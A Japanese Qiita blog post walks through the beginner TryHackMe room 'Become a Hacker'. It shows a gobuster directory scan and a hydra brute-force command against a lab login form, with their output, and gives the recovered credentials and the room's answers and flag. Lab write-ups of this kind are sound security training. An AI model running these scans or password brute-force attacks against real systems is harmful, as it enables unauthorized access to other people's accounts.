0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【TryHackMe】Become a Hacker:Walkthrough

Posted at

概要

TryHackMe「Become a Hacker」のWalkthroughです。

Task1

Q1.Which of the following options better represents the process where you simulate a hacker's actions to find vulnerabilities in a system?Offensive Security,Defensive Security

A.Offensive Security

Task2

Q1.What is the name of the hidden web page you discovered?

Hint.You should be able to find it in this list: sitemap, cgi-bin, login, register, and admin.

gobusterでディレクトリスキャンをします。

gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt
/images (Status: 301) [Size: 313] [-->http://www.onlineshop.thm/images/]
/css (Status: 301) [Size: 310] [-->http://www.onlineshop.thm/css/]
/js (Status: 301) [Size: 309] [-->http://www.onlineshop.thm/js/]
/login (Status: 301) [Size: 314] [-->http://www.onlineshop.thm/login/]

/loginページを発見しました。

task2 q1.jpg

A.login

Task3

Q1.What is the secret message that you have discovered?

Hint.Log in with the username admin and the password you discovered.

ログインフォームに対してhydraでブルートフォース攻撃を仕掛けます。

hydra -l admin -P passlist.txt www.onlineshop.thm http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V
[80][http-post-form] host: www.onlineshop.thm login: admin password: qwerty

Username: admin,Password: qwertyが分かったのでログインします。

task3 q1.jpg

A.born_to_be_a_hacker

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?